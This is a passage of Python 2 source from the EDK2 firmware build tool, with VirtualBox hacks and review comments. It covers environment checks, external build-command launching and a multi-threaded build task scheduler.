#   PATH            $(EDK_TOOLS_PATH)/Bin/<sys> must be set in PATH
#
# If any of the above environment variables is not set or has an error, the
# build is aborted via EdkLogger.error() (which raises a fatal error).
# On success the validated values are mirrored into GlobalData.
#
def CheckEnvVariable():
    # check WORKSPACE: required, must exist, and must not contain spaces
    # (make-based tool chains cannot handle paths with spaces).
    if "WORKSPACE" not in os.environ:
        EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
                        ExtraData="WORKSPACE")

    # Normalize case/separators so later prefix comparisons are reliable
    # on case-insensitive file systems.
    WorkspaceDir = os.path.normcase(os.path.normpath(os.environ["WORKSPACE"]))
    if not os.path.exists(WorkspaceDir):
        EdkLogger.error("build", FILE_NOT_FOUND, "WORKSPACE doesn't exist", ExtraData="%s" % WorkspaceDir)
    elif ' ' in WorkspaceDir:
        EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in WORKSPACE path",
                        ExtraData=WorkspaceDir)
    # Write the normalized value back so child processes inherit it.
    os.environ["WORKSPACE"] = WorkspaceDir

    #
    # Check EFI_SOURCE (Edk build convention). EDK_SOURCE will always point to ECP.
    # Unset variables default to the EdkCompatibilityPkg under the workspace.
    #
    if "ECP_SOURCE" not in os.environ:
        os.environ["ECP_SOURCE"] = os.path.join(WorkspaceDir, GlobalData.gEdkCompatibilityPkg)
    if "EFI_SOURCE" not in os.environ:
        os.environ["EFI_SOURCE"] = os.environ["ECP_SOURCE"]
    if "EDK_SOURCE" not in os.environ:
        os.environ["EDK_SOURCE"] = os.environ["ECP_SOURCE"]

    #
    # Unify case of characters on case-insensitive systems
    #
    EfiSourceDir = os.path.normcase(os.path.normpath(os.environ["EFI_SOURCE"]))
    EdkSourceDir = os.path.normcase(os.path.normpath(os.environ["EDK_SOURCE"]))
    EcpSourceDir = os.path.normcase(os.path.normpath(os.environ["ECP_SOURCE"]))

    os.environ["EFI_SOURCE"] = EfiSourceDir
    os.environ["EDK_SOURCE"] = EdkSourceDir
    os.environ["ECP_SOURCE"] = EcpSourceDir
    # NOTE(review): EDK_TOOLS_PATH is dereferenced here, but its presence is
    # only checked further below — an unset EDK_TOOLS_PATH would raise a
    # KeyError before reaching that friendlier error message. Confirm intent.
    os.environ["EDK_TOOLS_PATH"] = os.path.normcase(os.environ["EDK_TOOLS_PATH"])

    # A missing ECP tree is only a warning (Edk modules just can't be built);
    # a space in the path is fatal.
    if not os.path.exists(EcpSourceDir):
        EdkLogger.verbose("ECP_SOURCE = %s doesn't exist. Edk modules could not be built." % EcpSourceDir)
    elif ' ' in EcpSourceDir:
        EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in ECP_SOURCE path",
                        ExtraData=EcpSourceDir)
    # EDK_SOURCE pointing at the (possibly missing) ECP default is tolerated;
    # an explicit but nonexistent EDK_SOURCE is a hard error.
    if not os.path.exists(EdkSourceDir):
        if EdkSourceDir == EcpSourceDir:
            EdkLogger.verbose("EDK_SOURCE = %s doesn't exist. Edk modules could not be built." % EdkSourceDir)
        else:
            EdkLogger.error("build", PARAMETER_INVALID, "EDK_SOURCE does not exist",
                            ExtraData=EdkSourceDir)
    elif ' ' in EdkSourceDir:
        EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in EDK_SOURCE path",
                        ExtraData=EdkSourceDir)
    # Same tolerance rules for EFI_SOURCE.
    if not os.path.exists(EfiSourceDir):
        if EfiSourceDir == EcpSourceDir:
            EdkLogger.verbose("EFI_SOURCE = %s doesn't exist. Edk modules could not be built." % EfiSourceDir)
        else:
            EdkLogger.error("build", PARAMETER_INVALID, "EFI_SOURCE does not exist",
                            ExtraData=EfiSourceDir)
    elif ' ' in EfiSourceDir:
        EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in EFI_SOURCE path",
                        ExtraData=EfiSourceDir)

    # change absolute path to relative path to WORKSPACE
    # (find(...) != 0 means "WorkspaceDir is not a prefix" — all three source
    # trees are required to live under the workspace).
    if EfiSourceDir.upper().find(WorkspaceDir.upper()) != 0:
        EdkLogger.error("build", PARAMETER_INVALID, "EFI_SOURCE is not under WORKSPACE",
                        ExtraData="WORKSPACE = %s\n EFI_SOURCE = %s" % (WorkspaceDir, EfiSourceDir))
    if EdkSourceDir.upper().find(WorkspaceDir.upper()) != 0:
        EdkLogger.error("build", PARAMETER_INVALID, "EDK_SOURCE is not under WORKSPACE",
                        ExtraData="WORKSPACE = %s\n EDK_SOURCE = %s" % (WorkspaceDir, EdkSourceDir))
    if EcpSourceDir.upper().find(WorkspaceDir.upper()) != 0:
        EdkLogger.error("build", PARAMETER_INVALID, "ECP_SOURCE is not under WORKSPACE",
                        ExtraData="WORKSPACE = %s\n ECP_SOURCE = %s" % (WorkspaceDir, EcpSourceDir))

    # check EDK_TOOLS_PATH
    if "EDK_TOOLS_PATH" not in os.environ:
        EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
                        ExtraData="EDK_TOOLS_PATH")

    # check PATH
    if "PATH" not in os.environ:
        EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
                        ExtraData="PATH")

    # Publish the validated paths for the rest of the build tools.
    GlobalData.gWorkspace = WorkspaceDir
    GlobalData.gEfiSource = EfiSourceDir
    GlobalData.gEdkSource = EdkSourceDir
    GlobalData.gEcpSource = EcpSourceDir

    GlobalData.gGlobalDefines["WORKSPACE"] = WorkspaceDir
    GlobalData.gGlobalDefines["EFI_SOURCE"] = EfiSourceDir
    GlobalData.gGlobalDefines["EDK_SOURCE"] = EdkSourceDir
    GlobalData.gGlobalDefines["ECP_SOURCE"] = EcpSourceDir
    GlobalData.gGlobalDefines["EDK_TOOLS_PATH"] = os.environ["EDK_TOOLS_PATH"]
## Get normalized file path
#
# Convert the path to be local format, and remove the WORKSPACE path at the
# beginning if the file path is given in full path.
#
# @param FilePath File path to be normalized
# @param Workspace Workspace path which the FilePath will be checked against
#
# @retval string The normalized file path, relative to Workspace
#
def NormFile(FilePath, Workspace):
    # Absolute paths are normalized as-is; relative paths are resolved
    # against the workspace root first.
    if os.path.isabs(FilePath):
        FullPath = os.path.normpath(FilePath)
    else:
        FullPath = os.path.normpath(os.path.join(Workspace, FilePath))

    # Refuse anything that does not name an existing file.
    if not os.path.isfile(FullPath):
        EdkLogger.error("build", FILE_NOT_FOUND, ExtraData="\t%s (Please give file in absolute path or relative to WORKSPACE)" % FullPath)

    # Strip the workspace prefix; account for a possible trailing separator
    # on the workspace path so no leading slash is left on the result.
    PrefixLength = len(Workspace) if Workspace[-1] in ["\\", "/"] else len(Workspace) + 1
    return FullPath[PrefixLength:]
## Get the output of an external program
#
# Thread entry point that pumps lines from an external program's output
# stream into this program's STDOUT/STDERR until end-of-stream is reached
# or the stop flag is raised.
#
# @param From The stream message read from
# @param To The stream message put on
# @param ExitFlag The flag used to indicate stopping reading
#
def ReadMessage(From, To, ExitFlag):
    while True:
        # readline() yields one line at a time; an empty string means EOF.
        Line = From.readline()
        if not Line:
            break
        To(Line.rstrip())
        # Stop promptly once the caller signals shutdown.
        if ExitFlag.isSet():
            break
## Launch an external program
#
# This method will call subprocess.Popen to execute an external program with
# given options in specified directory. Because of the dead-lock issue during
# redirecting output of the external program, threads are used to do the
# redirection work.
#
# @param Command A list or string containing the call of the program
# @param WorkingDir The directory in which the program will be running
#
def LaunchCommand(Command, WorkingDir):
    # if working directory doesn't exist, Popen() will raise an exception
    if not os.path.isdir(WorkingDir):
        EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=WorkingDir)

    # Command is used as the first Argument in following Popen().
    # It could be a string or sequence. We find that if command is a string in following Popen(),
    # ubuntu may fail with an error message that the command is not found.
    # So here we may need convert command from string to list instance.
    if not isinstance(Command, list):
        if platform.system() != 'Windows' or True: # VBox: Added 'or True' (for the hack below).
            Command = Command.split()

    # VBox: Ugly hack! python 2.7.6 on Windows doesn't seem to correctly search for GenFds (should find GenFds.cmd).
    if Command[0] in ['GenFds',] and platform.system() == 'Windows':
        Command = [Command[0] + '.cmd'] + Command[1:];
    EdkLogger.info("Launching: '%s'; CWD=%s" % ("' '".join(Command), WorkingDir));

    Proc = None
    EndOfProcedure = None
    try:
        # launch the command
        Proc = Popen(Command, stdout=PIPE, stderr=PIPE, env=os.environ, cwd=WorkingDir, bufsize=-1)

        # launch two threads to read the STDOUT and STDERR
        EndOfProcedure = Event()
        EndOfProcedure.clear()
        if Proc.stdout:
            StdOutThread = Thread(target=ReadMessage, args=(Proc.stdout, EdkLogger.info, EndOfProcedure))
            StdOutThread.setName("STDOUT-Redirector")
            StdOutThread.setDaemon(False)
            StdOutThread.start()

        if Proc.stderr:
            StdErrThread = Thread(target=ReadMessage, args=(Proc.stderr, EdkLogger.quiet, EndOfProcedure))
            StdErrThread.setName("STDERR-Redirector")
            StdErrThread.setDaemon(False)
            StdErrThread.start()

        # waiting for program exit
        Proc.wait()
    except: # in case of aborting
        # terminate the threads redirecting the program output
        if EndOfProcedure != None:
            EndOfProcedure.set()
        # Proc still None means Popen() itself failed to start the command.
        if Proc == None:
            if type(Command) != type(""):
                Command = " ".join(Command)
            EdkLogger.error("build", COMMAND_FAILURE, "Failed to start command", ExtraData="%s [%s]" % (Command, WorkingDir))

    # NOTE(review): if an exception occurs after Popen() succeeds but before
    # the reader threads are created, StdOutThread/StdErrThread are unbound
    # here and these joins would raise NameError — confirm whether that
    # window is reachable in practice.
    if Proc.stdout:
        StdOutThread.join()
    if Proc.stderr:
        StdErrThread.join()

    # check the return code of the program
    if Proc.returncode != 0:
        if type(Command) != type(""):
            Command = " ".join(Command)
        EdkLogger.error("build", COMMAND_FAILURE, ExtraData="%s [%s]" % (Command, WorkingDir))
## The smallest unit that can be built in multi-thread build mode
#
# This is the base class of build unit. The "Obj" parameter must provide
# __str__(), __eq__() and __hash__() methods. Otherwise there could be build units
# missing build.
#
# Currently the "Obj" should be only ModuleAutoGen or PlatformAutoGen objects.
#
class BuildUnit:
    ## The constructor
    #
    # @param self The object pointer
    # @param Obj The object the build is working on
    # @param BuildCommand The build command (list or string) used to build Obj
    # @param Target The build target name, one of gSupportedTarget
    # @param Dependency The BuildUnit(s) which must be completed in advance
    # @param WorkingDir The directory build command starts in
    #
    def __init__(self, Obj, BuildCommand, Target, Dependency, WorkingDir="."):
        self.BuildObject = Obj
        self.Dependency = Dependency
        self.WorkingDir = WorkingDir
        self.Target = Target
        self.BuildCommand = BuildCommand
        if not BuildCommand:
            # An empty build command means tools_def.txt lacks a MAKE_PATH
            # entry for this target/toolchain/arch combination.
            EdkLogger.error("build", OPTION_MISSING,
                            "No build command found for this module. "
                            "Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
                                (Obj.BuildTarget, Obj.ToolChain, Obj.Arch),
                            ExtraData=str(Obj))

    ## str() method
    #
    # It just returns the string representation of self.BuildObject
    #
    # @param self The object pointer
    #
    def __str__(self):
        return str(self.BuildObject)

    ## "==" operator method
    #
    # Two build units are equal when they wrap equal build objects built for
    # the same architecture. Note: 'is not None' replaces the former
    # '!= None' — PEP 8 mandates identity comparison with None, and it also
    # avoids a pointless rich-comparison dispatch.
    #
    # @param self The object pointer
    # @param Other The other BuildUnit object compared to
    #
    def __eq__(self, Other):
        return Other is not None and self.BuildObject == Other.BuildObject \
                and self.BuildObject.Arch == Other.BuildObject.Arch

    ## hash() method
    #
    # It just returns the hash value of self.BuildObject which must be hashable,
    # mixed with the architecture so the hash stays consistent with __eq__.
    #
    # @param self The object pointer
    #
    def __hash__(self):
        return hash(self.BuildObject) + hash(self.BuildObject.Arch)

    def __repr__(self):
        return repr(self.BuildObject)
## The smallest module unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for module build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only ModuleAutoGen object.
#
class ModuleMakeUnit(BuildUnit):
    ## Constructor
    #
    #   @param  self    The object pointer
    #   @param  Obj     The ModuleAutoGen object the build is working on
    #   @param  Target  The build target name, one of gSupportedTarget
    #
    def __init__(self, Obj, Target):
        # Every library the module links against must be built beforehand, so
        # each one becomes a dependent make unit of this module.
        Dependency = []
        for LibraryAutoGen in Obj.LibraryAutoGenList:
            Dependency.append(ModuleMakeUnit(LibraryAutoGen, Target))
        BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
        # The default build targets map to the module-level "tbuild" makefile target.
        if Target in [None, "", "all"]:
            self.Target = "tbuild"
## The smallest platform unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for platform build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only PlatformAutoGen object.
#
class PlatformMakeUnit(BuildUnit):
    ## Constructor
    #
    #   @param  self    The object pointer
    #   @param  Obj     The PlatformAutoGen object the build is working on
    #   @param  Target  The build target name, one of gSupportedTarget
    #
    def __init__(self, Obj, Target):
        # BUG FIX: the dependency lists must be read from the constructor
        # argument 'Obj'. The original code read 'self.BuildObject', an
        # attribute that is only assigned later inside BuildUnit.__init__,
        # so every construction raised AttributeError before the base
        # constructor ever ran.
        Dependency = [ModuleMakeUnit(Lib, Target) for Lib in Obj.LibraryAutoGenList]
        Dependency.extend([ModuleMakeUnit(Mod, Target) for Mod in Obj.ModuleAutoGenList])
        BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
## The class representing the task of a module build or platform build
#
# This class manages the build tasks in multi-thread build mode. Its jobs include
# scheduling thread running, catching thread error, monitor the thread status, etc.
#
class BuildTask:
    # Tasks whose dependencies are not yet all complete, keyed by BuildUnit.
    # NOTE(review): sdict is presumably a project-supplied ordered dict; the
    # scheduler relies on keys() returning a list (Python 2 semantics) —
    # verify against its definition.
    _PendingQueue = sdict()
    _PendingQueueLock = threading.Lock()
    # queue for tasks ready for running (all dependencies satisfied)
    _ReadyQueue = sdict()
    _ReadyQueueLock = threading.Lock()
    # queue for tasks currently running in a build thread
    _RunningQueue = sdict()
    _RunningQueueLock = threading.Lock()
    # queue containing all build tasks ever created, used to avoid building
    # the same unit twice
    _TaskQueue = sdict()
    # flag indicating an error occurred in a running thread; this is the only
    # way a worker thread can report failure to the main thread
    _ErrorFlag = threading.Event()
    _ErrorFlag.clear()
    _ErrorMessage = ""
    # BoundedSemaphore object used to control the number of running threads
    _Thread = None
    # flag indicating whether the scheduler thread has stopped (set = stopped)
    _SchedulerStopped = threading.Event()
    _SchedulerStopped.set()
    ## Start the task scheduler thread
    #
    #   @param  MaxThreadNumber     The maximum number of concurrent build threads
    #   @param  ExitFlag            Event used to tell the scheduler to wind down
    #
    @staticmethod
    def StartScheduler(MaxThreadNumber, ExitFlag):
        SchedulerThread = Thread(target=BuildTask.Scheduler, args=(MaxThreadNumber, ExitFlag))
        SchedulerThread.setName("Build-Task-Scheduler")
        SchedulerThread.setDaemon(False)
        SchedulerThread.start()
        # wait for the scheduler to be started, especially useful in Linux
        while not BuildTask.IsOnGoing():
            time.sleep(0.01)
    ## Scheduler method
    #
    # Main loop of the scheduler thread: moves pending tasks whose
    # dependencies are satisfied into the ready queue, then launches ready
    # tasks while the semaphore permits, until told to exit or an error is
    # flagged by a worker thread.
    #
    #   @param  MaxThreadNumber     The maximum number of concurrent build threads
    #   @param  ExitFlag            Event used to tell the scheduler to wind down
    #
    @staticmethod
    def Scheduler(MaxThreadNumber, ExitFlag):
        BuildTask._SchedulerStopped.clear()
        try:
            # use BoundedSemaphore to control the maximum running threads
            BuildTask._Thread = BoundedSemaphore(MaxThreadNumber)
            #
            # scheduling loop, which exits when there is no pending/ready task
            # and the caller has signalled ExitFlag, or when a running thread
            # reports an error
            #
            while (len(BuildTask._PendingQueue) > 0 or len(BuildTask._ReadyQueue) > 0 \
                   or not ExitFlag.isSet()) and not BuildTask._ErrorFlag.isSet():
                EdkLogger.debug(EdkLogger.DEBUG_8, "Pending Queue (%d), Ready Queue (%d)"
                                % (len(BuildTask._PendingQueue), len(BuildTask._ReadyQueue)))
                # get all pending tasks (snapshot of the keys under the lock)
                BuildTask._PendingQueueLock.acquire()
                BuildObjectList = BuildTask._PendingQueue.keys()
                #
                # check if their dependency is resolved, and if true, move them
                # into ready queue
                #
                for BuildObject in BuildObjectList:
                    Bt = BuildTask._PendingQueue[BuildObject]
                    if Bt.IsReady():
                        BuildTask._ReadyQueue[BuildObject] = BuildTask._PendingQueue.pop(BuildObject)
                BuildTask._PendingQueueLock.release()
                # launch build threads until the maximum number of threads is reached
                while not BuildTask._ErrorFlag.isSet():
                    # empty ready queue, do nothing further
                    if len(BuildTask._ReadyQueue) == 0:
                        break
                    # wait (block) for an active thread slot to free up
                    BuildTask._Thread.acquire(True)
                    # start a new build thread for the first ready task
                    Bo = BuildTask._ReadyQueue.keys()[0]
                    Bt = BuildTask._ReadyQueue.pop(Bo)
                    # move into running queue
                    BuildTask._RunningQueueLock.acquire()
                    BuildTask._RunningQueue[Bo] = Bt
                    BuildTask._RunningQueueLock.release()
                    Bt.Start()
                    # avoid tense loop
                    time.sleep(0.01)
                # avoid tense loop
                time.sleep(0.01)
            # wait for all running threads exit
            if BuildTask._ErrorFlag.isSet():
                EdkLogger.quiet("\nWaiting for all build threads exit...")
            # while not BuildTask._ErrorFlag.isSet() and \
            while len(BuildTask._RunningQueue) > 0:
                EdkLogger.verbose("Waiting for thread ending...(%d)" % len(BuildTask._RunningQueue))
                EdkLogger.debug(EdkLogger.DEBUG_8, "Threads [%s]" % ", ".join([Th.getName() for Th in threading.enumerate()]))
                # avoid tense loop
                time.sleep(0.1)
        except BaseException, X:
            #
            # TRICK: hide the output of threads left running, so that the user
            # can catch the error message easily
            #
            EdkLogger.SetLevel(EdkLogger.ERROR)
            BuildTask._ErrorFlag.set()
            BuildTask._ErrorMessage = "build thread scheduler error\n\t%s" % str(X)
        # Reached whether or not the scheduling loop failed (the except clause
        # swallows the exception): drop all queued work and signal any
        # WaitForComplete() callers that the scheduler has stopped.
        BuildTask._PendingQueue.clear()
        BuildTask._ReadyQueue.clear()
        BuildTask._RunningQueue.clear()
        BuildTask._TaskQueue.clear()
        BuildTask._SchedulerStopped.set()
    ## Block the caller until the scheduler thread has fully stopped
    #
    @staticmethod
    def WaitForComplete():
        BuildTask._SchedulerStopped.wait()
    ## Check if the scheduler is running or not
    #
    @staticmethod
    def IsOnGoing():
        return not BuildTask._SchedulerStopped.isSet()
    ## Abort the build: flag an error and wait for the scheduler to stop
    @staticmethod
    def Abort():
        if BuildTask.IsOnGoing():
            BuildTask._ErrorFlag.set()
            BuildTask.WaitForComplete()
    ## Check if there's an error in a running thread
    #
    # Since the main thread cannot catch exceptions raised in other threads,
    # a threading.Event is used to communicate this information to the main
    # thread.
    #
    @staticmethod
    def HasError():
        return BuildTask._ErrorFlag.isSet()
    ## Get the error message recorded by a running thread
    #
    # Since the main thread cannot catch exceptions raised in other threads,
    # a static variable is used to communicate the message to the main thread.
    #
    @staticmethod
    def GetErrorMessage():
        return BuildTask._ErrorMessage
    ## Factory method to create a BuildTask object
    #
    # This method checks if a module is building or has been built; if so it
    # just returns the associated BuildTask object from _TaskQueue. If not,
    # it creates and returns a new BuildTask object, appended to
    # _PendingQueue for scheduling later.
    #
    #   @param  BuildItem       A BuildUnit object representing a build object
    #   @param  Dependency      The dependent build object of BuildItem
    #
    @staticmethod
    def New(BuildItem, Dependency=None):
        if BuildItem in BuildTask._TaskQueue:
            Bt = BuildTask._TaskQueue[BuildItem]
            return Bt
        Bt = BuildTask()
        Bt._Init(BuildItem, Dependency)
        BuildTask._TaskQueue[BuildItem] = Bt
        BuildTask._PendingQueueLock.acquire()
        BuildTask._PendingQueue[BuildItem] = Bt
        BuildTask._PendingQueueLock.release()
        return Bt
    ## The real constructor of BuildTask (called only from New())
    #
    #   @param  BuildItem       A BuildUnit object representing a build object
    #   @param  Dependency      The dependent build object of BuildItem; when
    #                           None, the BuildItem's own dependency list is used
    #
    def _Init(self, BuildItem, Dependency=None):
        self.BuildItem = BuildItem
        self.DependencyList = []
        if Dependency == None:
            Dependency = BuildItem.Dependency
        else:
            Dependency.extend(BuildItem.Dependency)
        self.AddDependency(Dependency)
        # flag indicating build completes, used to avoid unnecessary re-build
        self.CompleteFlag = False
    ## Check if all dependent build tasks are completed or not
    #
    def IsReady(self):
        ReadyFlag = True
        for Dep in self.DependencyList:
            if Dep.CompleteFlag == True:
                continue
            ReadyFlag = False
            break
        return ReadyFlag
    ## Add dependent build tasks (binary-only modules need no build, so they
    ## are skipped)
    #
    #   @param  Dependency      The list of dependent build objects
    #
    def AddDependency(self, Dependency):
        for Dep in Dependency:
            if not Dep.BuildObject.IsBinaryModule:
                self.DependencyList.append(BuildTask.New(Dep)) # BuildTask list
    ## The thread wrapper of the LaunchCommand function
    #
    # Runs the build command; on success marks the task complete, on any
    # failure records the error globally. In both cases the running-queue
    # entry and the semaphore slot are released so another task can start.
    #
    #   @param  Command         A list or string containing the command to run
    #   @param  WorkingDir      The directory in which the program will run
    #
    def _CommandThread(self, Command, WorkingDir):
        try:
            LaunchCommand(Command, WorkingDir)
            self.CompleteFlag = True
        except:
            #
            # TRICK: hide the output of threads left running, so that the user
            # can catch the error message easily
            #
            if not BuildTask._ErrorFlag.isSet():
                GlobalData.gBuildingModule = "%s [%s, %s, %s]" % (str(self.BuildItem.BuildObject),
                                                                  self.BuildItem.BuildObject.Arch,
                                                                  self.BuildItem.BuildObject.ToolChain,
                                                                  self.BuildItem.BuildObject.BuildTarget
                                                                 )
                EdkLogger.SetLevel(EdkLogger.ERROR)
                BuildTask._ErrorFlag.set()
                BuildTask._ErrorMessage = "%s broken\n %s [%s]" % \
                                          (threading.currentThread().getName(), Command, WorkingDir)
        # indicate there's a thread is available for another build task
        BuildTask._RunningQueueLock.acquire()
        BuildTask._RunningQueue.pop(self.BuildItem)
        BuildTask._RunningQueueLock.release()
        BuildTask._Thread.release()
    ## Start the build task thread
    #
    def Start(self):
        EdkLogger.quiet("Building ... %s" % repr(self.BuildItem))
        Command = self.BuildItem.BuildCommand + [self.BuildItem.Target]
        self.BuildTread = Thread(target=self._CommandThread, args=(Command, self.BuildItem.WorkingDir))
        self.BuildTread.setName("build thread")
        self.BuildTread.setDaemon(False)
        self.BuildTread.start()
## The class contains the information related to EFI image
#
class PeImageInfo():
    ## Constructor
    #
    # Constructor will load all required image information.
    #
    #   @param  BaseName          The full file path of image.
    #   @param  Guid              The GUID for image.
    #   @param  Arch              Arch of this image.
    #   @param  OutputDir         The output directory for image.
    #   @param  DebugDir          The debug directory for image.
    #   @param  ImageClass        PeImage information (must expose a numeric
    #                             'Size' attribute).
    #
    def __init__(self, BaseName, Guid, Arch, OutputDir, DebugDir, ImageClass):
        self.BaseName = BaseName
        self.Guid = Guid
        self.Arch = Arch
        self.OutputDir = OutputDir
        self.DebugDir = DebugDir
        self.Image = ImageClass
        # Round the image size up to the next 4 KiB page boundary.
        # BUG FIX: use floor division so the page count stays an integer even
        # under Python 3 (true division '/' would produce a float and corrupt
        # the computed size); for Python 2 ints '//' is behaviorally identical.
        self.Image.Size = (self.Image.Size // 0x1000 + 1) * 0x1000
## The class implementing the EDK2 build process
#
# The build process includes:
# 1. Load configuration from target.txt and tools_def.txt in $(WORKSPACE)/Conf
# 2. Parse DSC file of active platform
# 3. Parse FDF file if any
# 4. Establish build database, including parse all other files (module, package)
# 5. Create AutoGen files (C code file, depex file, makefile) if necessary
# 6. Call build command
#
class Build():
## Constructor
#
# Constructor will load all necessary configurations, parse platform, modules
# and packages and the establish a database for AutoGen.
#
# @param Target The build command target, one of gSupportedTarget
# @param WorkspaceDir The directory of workspace
# @param BuildOptions Build options passed from command line
#
    def __init__(self, Target, WorkspaceDir, BuildOptions):
        # Copy the command-line options into instance state.
        self.WorkspaceDir = WorkspaceDir
        self.Target = Target
        self.PlatformFile = BuildOptions.PlatformFile
        self.ModuleFile = BuildOptions.ModuleFile
        self.ArchList = BuildOptions.TargetArch
        self.ToolChainList = BuildOptions.ToolChain
        self.BuildTargetList= BuildOptions.BuildTarget
        self.Fdf = BuildOptions.FdfFile
        self.FdList = BuildOptions.RomImage
        self.FvList = BuildOptions.FvImage
        self.CapList = BuildOptions.CapName
        self.SilentMode = BuildOptions.SilentMode
        self.ThreadNumber = BuildOptions.ThreadNumber
        self.SkipAutoGen = BuildOptions.SkipAutoGen
        self.Reparse = BuildOptions.Reparse
        self.SkuId = BuildOptions.SkuId
        self.ConfDirectory = BuildOptions.ConfDirectory
        self.SpawnMode = True
        self.BuildReport = BuildReport(BuildOptions.ReportFile, BuildOptions.ReportType)
        self.TargetTxt = TargetTxtClassObject()
        self.ToolDef = ToolDefClassObject()
        #Set global flag for build mode
        GlobalData.gIgnoreSource = BuildOptions.IgnoreSources
        # Resolve the Conf directory (alternate location via --conf, or the
        # default WORKSPACE/Conf) and publish it through GlobalData.
        if self.ConfDirectory:
            # Get alternate Conf location, if it is absolute, then just use the absolute directory name
            ConfDirectoryPath = os.path.normpath(self.ConfDirectory)
            if not os.path.isabs(ConfDirectoryPath):
                # Since alternate directory name is not absolute, the alternate directory is located within the WORKSPACE
                # This also handles someone specifying the Conf directory in the workspace. Using --conf=Conf
                ConfDirectoryPath = os.path.join(self.WorkspaceDir, ConfDirectoryPath)
        else:
            # Get standard WORKSPACE/Conf use the absolute path to the WORKSPACE/Conf
            ConfDirectoryPath = os.path.join(self.WorkspaceDir, 'Conf')
        GlobalData.gConfDirectory = ConfDirectoryPath
        GlobalData.gDatabasePath = os.path.normpath(os.path.join(ConfDirectoryPath, GlobalData.gDatabasePath))
        # Open the workspace metafile database (in memory when caching is
        # disabled, otherwise the on-disk database, reparsing if requested).
        if BuildOptions.DisableCache:
            self.Db = WorkspaceDatabase(":memory:")
        else:
            self.Db = WorkspaceDatabase(GlobalData.gDatabasePath, self.Reparse)
        self.BuildDatabase = self.Db.BuildObject
        self.Platform = None
        self.LoadFixAddress = 0
        self.UniFlag = BuildOptions.Flag
        self.BuildModules = []
        # print dot character during doing some time-consuming work
        self.Progress = Utils.Progressor()
        # InitBuild() parses target.txt/tools_def.txt and validates the
        # platform file, so it must run after the database is opened.
        self.InitBuild()
        # print current build environment and configuration
        # NOTE(review): these environment variables are assumed to be set by
        # the surrounding tool's startup code; missing ones raise KeyError.
        EdkLogger.quiet("%-16s = %s" % ("WORKSPACE", os.environ["WORKSPACE"]))
        EdkLogger.quiet("%-16s = %s" % ("ECP_SOURCE", os.environ["ECP_SOURCE"]))
        EdkLogger.quiet("%-16s = %s" % ("EDK_SOURCE", os.environ["EDK_SOURCE"]))
        EdkLogger.quiet("%-16s = %s" % ("EFI_SOURCE", os.environ["EFI_SOURCE"]))
        EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_PATH", os.environ["EDK_TOOLS_PATH"]))
        EdkLogger.info("")
        os.chdir(self.WorkspaceDir)
## Load configuration
#
# This method will parse target.txt and get the build configurations.
#
    def LoadConfiguration(self):
        # Parse target.txt (and the tools_def.txt it points at), then fill in
        # every build setting not already provided on the command line:
        # architectures, build targets, tool chains, thread count and the
        # active platform.
        #
        # Check target.txt and tools_def.txt and Init them
        #
        BuildConfigurationFile = os.path.normpath(os.path.join(GlobalData.gConfDirectory, gBuildConfiguration))
        if os.path.isfile(BuildConfigurationFile) == True:
            StatusCode = self.TargetTxt.LoadTargetTxtFile(BuildConfigurationFile)
            # target.txt may name an alternate tool definition file; fall back
            # to the default when the entry is empty.
            ToolDefinitionFile = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_CONF]
            if ToolDefinitionFile == '':
                ToolDefinitionFile = gToolsDefinition
            ToolDefinitionFile = os.path.normpath(os.path.join(self.WorkspaceDir, 'Conf', ToolDefinitionFile))
            if os.path.isfile(ToolDefinitionFile) == True:
                StatusCode = self.ToolDef.LoadToolDefFile(ToolDefinitionFile)
            else:
                EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=ToolDefinitionFile)
        else:
            EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=BuildConfigurationFile)
        # if no ARCH given in command line, get it from target.txt
        if not self.ArchList:
            self.ArchList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TARGET_ARCH]
        self.ArchList = tuple(self.ArchList)
        # if no build target given in command line, get it from target.txt
        if not self.BuildTargetList:
            self.BuildTargetList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TARGET]
        # if no tool chain given in command line, get it from target.txt
        if not self.ToolChainList:
            self.ToolChainList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_TAG]
            if self.ToolChainList == None or len(self.ToolChainList) == 0:
                EdkLogger.error("build", RESOURCE_NOT_AVAILABLE, ExtraData="No toolchain given. Don't know how to build.\n")
        # check if the tool chains are defined or not; undefined ones are
        # dropped with a warning
        NewToolChainList = []
        for ToolChain in self.ToolChainList:
            if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]:
                EdkLogger.warn("build", "Tool chain [%s] is not defined" % ToolChain)
            else:
                NewToolChainList.append(ToolChain)
        # if no tool chain available, break the build
        if len(NewToolChainList) == 0:
            EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
                            ExtraData="[%s] not defined. No toolchain available for build!\n" % ", ".join(self.ToolChainList))
        else:
            self.ToolChainList = NewToolChainList
        # Thread count: command line wins; otherwise target.txt; a value of 0
        # (or empty) falls back to a single thread.
        if self.ThreadNumber == None:
